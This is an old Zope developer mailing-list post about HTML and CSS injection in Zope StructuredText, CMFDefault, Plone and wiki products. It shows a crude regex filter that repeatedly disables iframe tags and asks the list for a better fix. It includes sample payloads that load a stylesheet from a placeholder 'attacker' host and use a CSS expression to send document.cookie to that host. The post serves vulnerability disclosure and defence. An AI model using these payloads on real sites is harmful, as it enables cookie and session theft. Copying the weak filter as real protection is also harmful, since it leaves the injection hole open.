[Zope-dev] weak examples, weak exploits
Kazuya FUKAMACHI
kf@atransia.co.jp
Tue, 24 Jun 2003 00:30:55 +0900
On Mon, 23 Jun 2003 01:20:35 -0700
Jamie Heilman <jamie@audible.transient.net> wrote:
> http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt
[snip]
> apps, and apart from 1 and 3 there are probably legitimate bugs there.
Related issues:
CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a,
as far as the site permits anonymous users or persons without good
references to write.
To cope with the matter, I stupidly put multiple string substitutions.
import re
# The same substitution is applied three times so that an iframe tag
# uncovered by one pass (e.g. behind a stray '<') is caught by the next.
t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'<disabled \1>', t)
t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'<disabled \1>', t)
t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'<disabled \1>', t)
It would be appreciated if someone advised me of a more general
and smart way.
I know that Zope's StructuredText itself does not handle such a case,
and that kind of implementation may be left to each developer.
If it had the ability to avoid them, it would be much better, I think.
Another example:
The following sample may allow importing malicious.css from outside
the site. Put #1 or #2 in a StructuredText page.
#1
<LINK rel="stylesheet" href="http://attacker/malicious.css">
#2
<STYLE type="text/css">
@import url('http://attacker/malicious.css');
</STYLE>
# example of malicious.css
http://attacker/malicious.css
body { left: expression(eval(
'document.location="http://attacker/"+document.cookie;')) }
For example, make a 'Document' in a CMFDefault site,
and put #1 in the reply form (DiscussionItem) for the original
document, etc. It seems CMFDefault is vulnerable to this attack.
Any general remedy for that kind of exploit?
--
Kazuya Fukamachi